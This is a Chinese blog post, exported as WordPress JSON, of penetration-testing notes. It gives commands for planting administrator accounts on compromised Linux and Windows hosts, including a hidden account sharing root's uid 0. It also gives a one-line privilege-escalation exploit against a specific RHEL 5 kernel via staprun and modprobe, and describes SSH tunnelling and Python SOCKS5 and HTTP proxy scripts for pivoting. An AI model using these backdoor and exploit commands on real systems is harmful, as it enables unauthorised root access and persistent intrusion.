{"id":5783,"date":"2024-09-01T14:01:03","date_gmt":"2024-09-01T06:01:03","guid":{"rendered":""},"modified":"2024-09-01T14:01:03","modified_gmt":"2024-09-01T06:01:03","slug":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d","status":"publish","type":"post","link":"https:\/\/mushiming.com\/5783.html","title":{"rendered":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d"},"content":{"rendered":"

1. \u5f53\u5f97\u5230linux root shell\u65f6\uff0c\u91c7\u7528\u5982\u4e0b\u8bed\u53e5\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u5e10\u6237<\/p>\n

  \u5199\u9053<\/p>\n

\n useradd icefish \/\/\u6dfb\u52a0icefish\u7528\u6237
\n
passwd icefish \/\/\u8bbe\u7f6e\u5bc6\u7801 <\/p>\n

awk -F: '{print $1}' \/etc\/passwd \u53ef\u4ee5\u67e5\u770b\u6709\u591a\u5c11\u7528\u6237 <\/p>\n

\u4e0d\u8fc7\u521a\u5efa\u7acb\u7684\u8d26\u6237\u90fd\u662f\u88ab\u9501\u72b6\u6001\u9700\u8981\u89e3\u9501 <\/p>\n

usermod -U icefish
\n
\u6216\u8005
\n
usermod -u uid <\/p>\n

usermod -G root icefish \/\/\u6dfb\u52a0\u7ba1\u7406\u5458\u7ec4
\n
\u6216\u8005
\n
usermod -g 0 icefish <\/p>\n

\u5c31ok\u4e86
\n
\u4e0b\u9762\u662fusermod\u7684\u5e2e\u52a9\u6587\u6863\u90a3\u4e2a <\/p>\n

[root@localhost ~]# usermod
\n
Usage: usermod [options] LOGIN <\/p>\n

Options:
\n
-a, --append append the user to the supplemental GROUPS
\n
(use only with -G)
\n
-c, --comment COMMENT new value of the GECOS field
\n
-d, --home HOME_DIR new home directory for the user account
\n
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
\n
-f, --inactive INACTIVE set password inactive after expiration
\n
to INACTIVE
\n
-g, --gid GROUP force use GROUP as new primary group
\n
-G, --groups GROUPS new list of supplementary GROUPS
\n
-h, --help display this help message and exit
\n
-l, --login NEW_LOGIN new value of the login name
\n
-L, --lock lock the user account
\n
-m, --move-home move contents of the home directory to the new
\n
location (use only with -d)
\n
-o, --non-unique allow using duplicate (non-unique) UID
\n
-p, --password PASSWORD use encrypted password for the new password
\n
-s, --shell SHELL new login shell for the user account
\n
-u, --uid UID new UID for the user account
\n
-U, --unlock unlock the user account
\n
-Z, --selinux-user new selinux user mapping for the user account
\n
\n<\/div>\n

 <\/p>\n

windows \u7684\u5c31\u4e0d\u7528\u591a\u8bf4\u4e86<\/p>\n

   \u5199\u9053<\/p>\n

\n net user icetest icetest \/add
\n
net localgroup administrators icetest \/add\n<\/div>\n

 <\/p>\n

 <\/p>\n

\u5f53\u7136\u6211\u4e5f\u89c1\u8fc7\u4e00\u79cd\u4e00\u53e5\u7684linux\u52a0\u8d26\u6237\u7684<\/p>\n

  \u5199\u9053<\/p>\n

\n useradd -u 0 -o -g root -G root -d \/home\/icetest2 icetest2
\n
passwd icetest2
\n
\n<\/div>\n

 \u8fd9\u79cd\u52a0\u51fa\u6765\u7684\u7528\u6237\u76f4\u63a5\u548c\u7ba1\u7406\u5458root\u540cuid \uff0c\u6bd4\u8f83\u65b9\u4fbf<\/p>\n

 <\/p>\n

 <\/p>\n

 <\/p>\n

2. \u4e00\u53e5\u8bddlinux\u63d0\u6743<\/p>\n

\u67e5\u770blinux \u5185\u6838\u7248\u672c uname -a<\/p>\n<\/p>\n

\n  \u5199\u9053\n<\/div>\n
\n Linux 2.6.18-194.el5 \u63d0\u6743
\n
\u4e00\u53e5\u8bdd\u63d0\u6743
\n
printf \"install uprobes \/bin\/sh\" > exploit.conf; MODPROBE_OPTIONS=\"-C exploit.conf\" staprun -u whatever
\n
\n<\/div>\n

 \u8fd9\u4e2a\u6bd4\u8f83\u65b9\u4fbf<\/p>\n

 <\/p>\n

 <\/p>\n

3. ssh\u7aef\u53e3\u8f6c\u53d1\u4ee3\u7406\uff0c\u8fd9\u4e2a\u4f5c\u7528\u5927\u5bb6\u90fd\u61c2\u7684<\/p>\n

     \u7b2c\u4e00\u79cd\u53ef\u4ee5\u5229\u7528windows\u4e0b\u7684\u5ba2\u6237\u7aef\u4f8b\u5982SecureCRT\u4e2d\u7684<\/p>\n

          session options\u4e2d\u7684Port Forwarding<\/p>\n

\"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d<\/p>\n

\u7b2c\u4e8c\u79cd\u5c31\u662f\u81ea\u5df1\u624b\u52a8\u547d\u4ee4\u4e86<\/p>\n

      http:\/\/.blog.51cto.com\/69854\/<\/p>\n

\u8fd9\u7bc7\u5927\u81f4\u8bb2\u7684\u8fd8\u662f\u86ee\u7ec6\u7684\u3002<\/p>\n

\u57fa\u672c\u4e0a\u5c31\u662f<\/p>\n<\/p>\n\n\n\n
\n
ssh -L <local port>:<remote host>:<remote port> <SSH hostname> \u4ee5\u53ca <\/pre>\n\n\n\n
\n
ssh -R <local port>:<remote host>:<remote port> <SSH hostname><\/pre>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
ssh -D <local port> <SSH Server><\/pre>\n

\u8fd9\u4e09\u79cd\u5e94\u8be5\u662f\u6bd4\u8f83\u5e38\u7528\u7684 \u6211\u4e2a\u4eba\u89c9\u5f97 ssh -D 7001 192.168.4.130\u8fd9\u79cd\u5e2e\u52a9\u6bd4\u8f83\u5927\uff0c\u4ee5\u53ca\u7b2c\u4e00\u79cd\u672c\u5730\u4ee3\u7406\u7684\u65b9\u5f0f <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

 <\/p>\n

 <\/p>\n

\u7b2c\u4e09\u79cd\u5c31\u662f\u501f\u52a9\u522b\u7684\u4ee3\u7801\u6765\u76f4\u63a5\u5b9e\u73b0socket\u4ee3\u7406<\/p>\n

 <\/p>\n

\u6211\u6bd4\u8f83\u503e\u5411\u4e8epython\u7684\uff0c\u4f46\u662f\u6211\u590d\u73b0\u7684\u65f6\u5019\u6ca1\u6210\u529f\uff0c<\/p>\n

\u6709\u4ee5\u4e0b\u4e24\u79cd\uff0c\u5206\u522b\u662fSOCKS5\u548chttp\u4ee3\u7406<\/p>\n<\/p>\n

#! \/usr\/bin\/env python #coding=utf-8 import socket, sys, select, SocketServer, struct, time class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass class Socks5Server(SocketServer.StreamRequestHandler): def handle_tcp(self, sock, remote): fdset = [sock, remote] while True: r, w, e = select.select(fdset, [], []) if sock in r: if remote.send(sock.recv(4096)) <= 0: break if remote in r: if sock.send(remote.recv(4096)) <= 0: break def handle(self): try: print 'socks connection from ', self.client_address sock = self.connection # 1. Version sock.recv(262) sock.send(b\"\\x05\\x00\"); # 2. Request data = self.rfile.read(4) mode = ord(data[1]) addrtype = ord(data[3]) if addrtype == 1: # IPv4 addr = socket.inet_ntoa(self.rfile.read(4)) elif addrtype == 3: # Domain name addr = self.rfile.read(ord(sock.recv(1)[0])) port = struct.unpack('>H', self.rfile.read(2)) reply = b\"\\x05\\x00\\x00\\x01\" try: if mode == 1: # 1. Tcp connect remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((addr, port[0])) print 'Tcp connect to', addr, port[0] else: reply = b\"\\x05\\x07\\x00\\x01\" # Command not supported local = remote.getsockname() reply += socket.inet_aton(local[0]) + struct.pack(\"&gt;H\", local[1]) except socket.error: # Connection refused reply = '\\x05\\x05\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00' sock.send(reply) # 3. Transfering if reply[1] == '\\x00': # Success if mode == 1: # 1. Tcp connect self.handle_tcp(sock, remote) except socket.error: print 'socket error' def main(): server = ThreadingTCPServer(('', 2013), Socks5Server) server.serve_forever() if __name__ == '__main__': main() <\/code><\/pre>\n

  <\/p>\n

 <\/p>\n

http \u4ee3\u7406<\/p>\n<\/p>\n

# -*- coding: cp1252 -*- # <PythonProxy.py> # #Copyright (c) <2009> <F\u00e1bio Domingues - fnds3000 in gmail.com> # #Permission is hereby granted, free of charge, to any person #obtaining a copy of this software and associated documentation #files (the \"Software\"), to deal in the Software without #restriction, including without limitation the rights to use, #copy, modify, merge, publish, distribute, sublicense, and\/or sell #copies of the Software, and to permit persons to whom the #Software is furnished to do so, subject to the following #conditions: # #The above copyright notice and this permission notice shall be #included in all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, #EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES #OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT #HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, #WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR #OTHER DEALINGS IN THE SOFTWARE. \"\"\"\\ Copyright (c) <2009> <F\u00e1bio Domingues - fnds3000 in gmail.com> <MIT Licence> ************************************** *** Python Proxy - A Fast HTTP proxy *** ************************************** Neste momento este proxy \u00e9 um Elie Proxy. Suporta os m\u00e9todos HTTP: - OPTIONS; - GET; - HEAD; - POST; - PUT; - DELETE; - TRACE; - CONENCT. Suporta: - Conex\u00f5es dos cliente em IPv4 ou IPv6; - Conex\u00f5es ao alvo em IPv4 e IPv6; - Conex\u00f5es todo o tipo de transmiss\u00e3o de dados TCP (CONNECT tunneling), p.e. liga\u00e7\u00f5es SSL, como \u00e9 o caso do HTTPS. 
A fazer: - Verificar se o input vindo do cliente est\u00e1 correcto; - Enviar os devidos HTTP erros se n\u00e3o, ou simplesmente quebrar a liga\u00e7\u00e3o; - Criar um gestor de erros; - Criar ficheiro log de erros; - Colocar excep\u00e7\u00f5es nos s\u00edtios onde \u00e9 previs\u00edvel a ocorr\u00eancia de erros, p.e.sockets e ficheiros; - Rever tudo e melhorar a estrutura do programar e colocar nomes adequados nas vari\u00e1veis e m\u00e9todos; - Comentar o programa decentemente; - Doc Strings. Funcionalidades futuras: - Adiconar a funcionalidade de proxy an\u00f3nimo e transparente; - Suportar FTP?. (!) Aten\u00e7\u00e3o o que se segue s\u00f3 tem efeito em conex\u00f5es n\u00e3o CONNECT, para estas o proxy \u00e9 sempre Elite. Qual a diferen\u00e7a entre um proxy Elite, An\u00f3nimo e Transparente? - Um proxy elite \u00e9 totalmente an\u00f3nimo, o servidor que o recebe n\u00e3o consegue ter conhecimento da exist\u00eancia do proxy e n\u00e3o recebe o endere\u00e7o IP do cliente; - Quando \u00e9 usado um proxy an\u00f3nimo o servidor sabe que o cliente est\u00e1 a usar um proxy mas n\u00e3o sabe o endere\u00e7o IP do cliente; \u00c9 enviado o cabe\u00e7alho HTTP \"Proxy-agent\". - Um proxy transparente fornece ao servidor o IP do cliente e um informa\u00e7\u00e3o que se est\u00e1 a usar um proxy. S\u00e3o enviados os cabe\u00e7alhos HTTP \"Proxy-agent\" e \"HTTP_X_FORWARDED_FOR\". 
\"\"\" import socket, thread, select __version__ = '0.1.0 Draft 1' BUFLEN = 8192 VERSION = 'Python Proxy\/'+__version__ HTTPVER = 'HTTP\/1.1' class ConnectionHandler: def __init__(self, connection, address, timeout): self.client = connection self.client_buffer = '' self.timeout = timeout self.method, self.path, self.protocol = self.get_base_header() if self.method=='CONNECT': self.method_CONNECT() elif self.method in ('OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE'): self.method_others() self.client.close() self.target.close() def get_base_header(self): while 1: self.client_buffer += self.client.recv(BUFLEN) end = self.client_buffer.find('\\n') if end!=-1: break print '%s'%self.client_buffer[:end]#debug data = (self.client_buffer[:end+1]).split() self.client_buffer = self.client_buffer[end+1:] return data def method_CONNECT(self): self._connect_target(self.path) self.client.send(HTTPVER+' 200 Connection established\\n'+ 'Proxy-agent: %s\\n\\n'%VERSION) self.client_buffer = '' self._read_write() def method_others(self): self.path = self.path[7:] i = self.path.find('\/') host = self.path[:i] path = self.path[i:] self._connect_target(host) self.target.send('%s %s %s\\n'%(self.method, path, self.protocol)+ self.client_buffer) self.client_buffer = '' self._read_write() def _connect_target(self, host): i = host.find(':') if i!=-1: port = int(host[i+1:]) host = host[:i] else: port = 80 (soc_family, _, _, _, address) = socket.getaddrinfo(host, port)[0] self.target = socket.socket(soc_family) self.target.connect(address) def _read_write(self): time_out_max = self.timeout\/3 socs = [self.client, self.target] count = 0 while 1: count += 1 (recv, _, error) = select.select(socs, [], socs, 3) if error: break if recv: for in_ in recv: data = in_.recv(BUFLEN) if in_ is self.client: out = self.target else: out = self.client if data: out.send(data) count = 0 if count == time_out_max: break def start_server(host='localhost', port=8082, IPv6=False, timeout=60, 
handler=ConnectionHandler): if IPv6==True: soc_type=socket.AF_INET6 else: soc_type=socket.AF_INET soc = socket.socket(soc_type) soc.bind((host, port)) print \"Serving on %s:%d.\"%(host, port)#debug soc.listen(0) while 1: thread.start_new_thread(handler, soc.accept()+(timeout,)) if __name__ == '__main__': start_server(host='',port=8082) <\/code><\/pre>\n

 <\/p>\n

4 \u7b2c\u56db\u4e2a\u5176\u5b9e\u662fmysql udf\u63d0\u6743\uff0c\u6709\u7a7a\u518d\u5199\u5427<\/p>\n","protected":false},"excerpt":{"rendered":"\u5173\u4e8eweb\u6e17\u900f\u4e2d\u5f97\u4e00\u4e9b\u8bb0\u5f55\u662f\u4ec0\u4e48_web\u6e17\u900f\u662f\u4ec0\u4e48\u610f\u601d1.\u5f53\u5f97\u5230linuxrootshell\u65f6\uff0c\u91c7\u7528\u5982\u4e0b\u8bed\u53e5\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u5e10\u6237\u5199\u9053useraddice...","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"_links":{"self":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/5783"}],"collection":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/comments?post=5783"}],"version-history":[{"count":0,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/posts\/5783\/revisions"}],"wp:attachment":[{"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/media?parent=5783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/categories?post=5783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mushiming.com\/wp-json\/wp\/v2\/tags?post=5783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}